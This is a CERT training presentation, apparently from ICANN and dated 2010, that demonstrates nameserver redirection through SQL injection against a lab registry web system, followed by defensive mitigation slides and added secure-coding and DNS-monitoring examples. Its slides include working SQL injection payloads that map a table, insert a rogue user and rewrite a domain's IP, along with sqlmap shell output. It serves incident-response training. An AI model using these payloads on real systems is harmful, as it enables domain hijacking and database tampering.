DNS Security for CERTs - Attack Scenarios & Demonstrations NameServer Redirection Chris Evans Delta Risk, LLC 7 March 2010 1

Presentation by ICANN

Page 1: Day 2   Dns Cert 4b Name Server Redirection

DNS Security for CERTs – Attack Scenarios & Demonstrations

NameServer Redirection

Chris Evans, Delta Risk, LLC

7 March 2010

Page 2

What You Will Need for the Exercise

• Please Watch the Live Demonstration in Front

– We will be targeting the web registry system

• You may need your Ubuntu VM to:

– Prior to attack, verify the Web Registry System URL: http://www.tld1 points to 192.168.101.50

– After attack, determine where http://www.tld1 points to

Page 3

Description – NameServer Redirection

• Change of Registration or Delegation Data

– Intentional

  • Disgruntled employee changes registry data

  • Outsiders pretending to be a customer request an “update” to their account

  • Hackers change the registry database directly through web attacks

– Accidental

  • Untrained employee

  • Typos in registry data

Diagram (delegation table before and after the change):

  Domain1 NS 1.1.1.1
  Domain2 NS 2.2.2.2
  Domain3 NS 3.3.3.3 -> 5.5.5.5    Attacker now controls resolutions for Domain3

Page 4

Case Study

• SQL Injection Tops List of Data Breach Attacks

– SQL Injection used in 60% of all data breach attacks, 19% of all security breaches on the Internet (source: DarkReading.com)

– Insecure programming techniques combined with proliferation of web-based applications = trouble

– Increase in automated techniques to detect and exploit vulnerabilities = double trouble

Page 5

Case Study

• Summer of 2009, several African & Pacific ccTLD web-based registry systems were attacked through SQL injection

– Attackers created new user accounts within the system

– These accounts were used to modify existing registrations and re-delegate sites to malicious content

http://www.icann.org/en/security/sa-2009-0001.htm

Page 6

Attack Demonstration

Your website is designed to perform a query during a valid login attempt:

  SELECT * FROM table WHERE username='mike' AND password='!QAZ2wsx'

SQL Injection …. well…. injects SQL statements into your backend database query:

  SELECT * FROM table WHERE username='mike'; INSERT hacker INTO database --

New SQL statement injected…. …and the rest of the original SQL statement gets commented out with “--”

Page 7

Demonstration – Attacker View

Reconnaissance & Table Mapping...

  ' group by srs_users.username having 1=1--

One single ' nets: table name and two variables

  ';insert into srs_users values(101,'hacker','password')--

Adds user hacker to the database…….

Page 8

Demonstration – Attacker View (cont.)

Enumerating the Database…

Use SQL Injection tool to gain a shell to the database <SQL-map>:

  sql-shell> select * from srs_regs where fqdn='rogue.tld1'
  do you want to retrieve the SQL statement output? [Y/n] y
  [15:15:56] [INFO] fetching SQL SELECT statement query output: 'select * from srs_regs where fqdn='rogue.tld1''
  [15:15:56] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
  [15:15:56] [WARNING] on PostgreSQL it is only possible to enumerate on the current schema and on system databases, sqlmap is going to use 'public' schema as database name
  [15:15:56] [INFO] fetching columns for table 'srs_regs' on database 'public'
  [15:15:56] [INFO] fetching number of columns for table 'srs_regs' on database 'public'
  [15:15:56] [INFO] retrieved: 9
  [15:15:57] [INFO] retrieved: regid
  [15:15:59] [INFO] retrieved: type
  [15:16:01] [INFO] retrieved: fqdn
  [15:16:03] [INFO] retrieved: ns
  [15:16:04] [INFO] retrieved: ip
  [15:16:06] [INFO] retrieved: recordtype
  [15:16:10] [INFO] retrieved: hostname
  [15:16:14] [INFO] retrieved: ownerid
  [15:16:17] [INFO] retrieved: parentid

…then update a record with bad IP…

  '; update srs_regs set (ip)=('192.168.85.5') where regid = 1 --

Page 9

Demonstration – Server View

Page 10

Demonstration – User View

1. One minute you get the correct IP and website…

  ; <<>> DiG 9.5.1-P2 <<>> www.tld1
  ;; global options: printcmd
  ;; Got answer:
  ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
  ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

  ;; QUESTION SECTION:
  ;www.tld1. IN A

  ;; ANSWER SECTION:
  www.tld1. 180 IN A 192.168.101.50

  ;; AUTHORITY SECTION:

2. …the next you’re browsing whatever the hacker wants you to!

  ; <<>> DiG 9.5.1-P2 <<>> www.tld1
  ;; global options: printcmd
  ;; Got answer:
  ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
  ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

  ;; QUESTION SECTION:
  ;www.tld1. IN A

  ;; ANSWER SECTION:
  www.tld1. 180 IN A 192.168.85.5

  ;; AUTHORITY SECTION:

Page 11

Impact

• Registry suffers public relations hit, potential loss of customers & revenue

• Loss of brand reputation, customers, or revenue for registrants who are victimized

• Effect of attack persists even after detection and mitigation because of TTLs

Page 12

Mitigation & Response Strategies

• SQL Injection

– Practice secure coding principles in any web-based application that has database connectivity

– Validate input and prevent “magic characters”

– Use a Web Application Firewall to filter/validate the input to your web application

– Use database logging to track queries and the pages they are being run on.

– Frequently audit your web applications (not just the systems they run on!)
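Added example, not code from the presentation: the login query from the "Attack Demonstration" slide in its string-built form beside the parameterised form that "practice secure coding principles" calls for, run against a constructed stand-in for the srs_users table (the column layout and the sqlite3 backend are assumptions; executescript() is used only to emulate a driver that accepts stacked statements, as the PostgreSQL backend in the demonstration did).

```python
import sqlite3

# Constructed stand-in for the registry's srs_users table named on the slides
# (assumed columns: id, username, password) with one legitimate account.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE srs_users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO srs_users VALUES (1, 'mike', '!QAZ2wsx')")
    db.commit()
    return db

def user_count(db):
    return db.execute("SELECT count(*) FROM srs_users").fetchone()[0]

def login_vulnerable(db, username, password):
    # The query is assembled by pasting user input into the SQL text, so a
    # quote in the input closes the string literal and everything after it is
    # executed as SQL; "--" comments out the remainder of the original query.
    # executescript() emulates a driver that accepts stacked statements.
    sql = ("SELECT * FROM srs_users WHERE username='%s' AND password='%s'"
           % (username, password))
    db.executescript(sql)
    return sql  # the text the database actually received

def login_safe(db, username, password):
    # Parameterised query: the input is bound as a value and cannot alter the
    # statement's structure, so quotes and "--" are just characters to match.
    return db.execute(
        "SELECT id, username FROM srs_users WHERE username=? AND password=?",
        (username, password)).fetchone()

# The payload shown on the "Attacker View" slide, reused to contrast the two.
PAYLOAD = "';insert into srs_users values(101,'hacker','password')--"

def demo():
    db = make_db()
    login_safe(db, PAYLOAD, "x")        # looked up as a (non-existent) username
    safe_count = user_count(db)         # still 1: no row was added
    login_vulnerable(db, PAYLOAD, "x")  # the embedded INSERT runs
    return safe_count, user_count(db)   # (1, 2)
```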

Page 13

Mitigation & Response Strategies

• Nameserver Redirection

– Multi-factor authentication of changes

– Out-of-band check of changes (e.g. phone, in-person)

– Domain “locks” which prevent updates unless manually approved

– Validation of changes before publishing new zone files

– Processes for contacting ISPs to “clear” cached entries

– Automated, continuous validation of published data with automated alerting

– Also see ICANN SSAC Report SAC040
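Added example, not part of the presentation: one way to do the "automated, continuous validation of published data with automated alerting" above, checking dig-style answers for www.tld1 (which the exercise says must point to 192.168.101.50) against the registry's expected data and reporting the TTL for which resolvers may keep a bad answer, as the "Impact" slide warns. The expected table and the dig output are constructed to match the slides' captures.

```python
import re

# Expected published data for the exercise (constructed from the slides; a real
# monitor would load this from the registry's own authoritative records).
EXPECTED = {"www.tld1.": {"192.168.101.50"}}

ANSWER_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+A\s+(\S+)$")

def dig_sample(ip, ttl=180):
    # Constructed dig output in the same shape as the slides' before/after captures
    return (";; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392\n"
            ";; QUESTION SECTION:\n;www.tld1. IN A\n"
            ";; ANSWER SECTION:\n"
            f"www.tld1. {ttl} IN A {ip}\n"
            ";; AUTHORITY SECTION:\n")

def parse_answers(dig_output):
    """Return [(name, ttl, ip)] for every A record in the ANSWER SECTION."""
    answers, in_answer = [], False
    for raw in dig_output.splitlines():
        line = raw.strip()
        if line.startswith(";; ANSWER SECTION:"):
            in_answer = True
            continue
        if line.startswith(";;"):  # any other section header ends the answer block
            in_answer = False
        m = ANSWER_RE.match(line) if in_answer else None
        if m:
            answers.append((m.group(1), int(m.group(2)), m.group(3)))
    return answers

def check_published(dig_output, expected=EXPECTED):
    """Compare what resolvers see with what should be published; return alerts."""
    alerts, seen = [], set()
    for name, ttl, ip in parse_answers(dig_output):
        seen.add(name)
        good = expected.get(name)
        if good is not None and ip not in good:
            alerts.append(f"ALERT {name} A {ip} published, expected {sorted(good)}; "
                          f"resolvers may keep the bad answer for up to {ttl}s")
    for name in expected.keys() - seen:  # a missing record is also a change
        alerts.append(f"ALERT {name} returned no A record")
    return alerts
```

Run it from cron or a scheduler against the registry's published zone every few minutes and route the returned alerts to the on-call channel.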

Page 14

Mitigation & Response Strategies

• Information Sharing – if you’re the victim of an attack – share the details of the attack within the community – you may prevent someone else from becoming a victim

As trusted entities, CERTs can encourage this type of exchange within their communities.

Page 15

Questions?
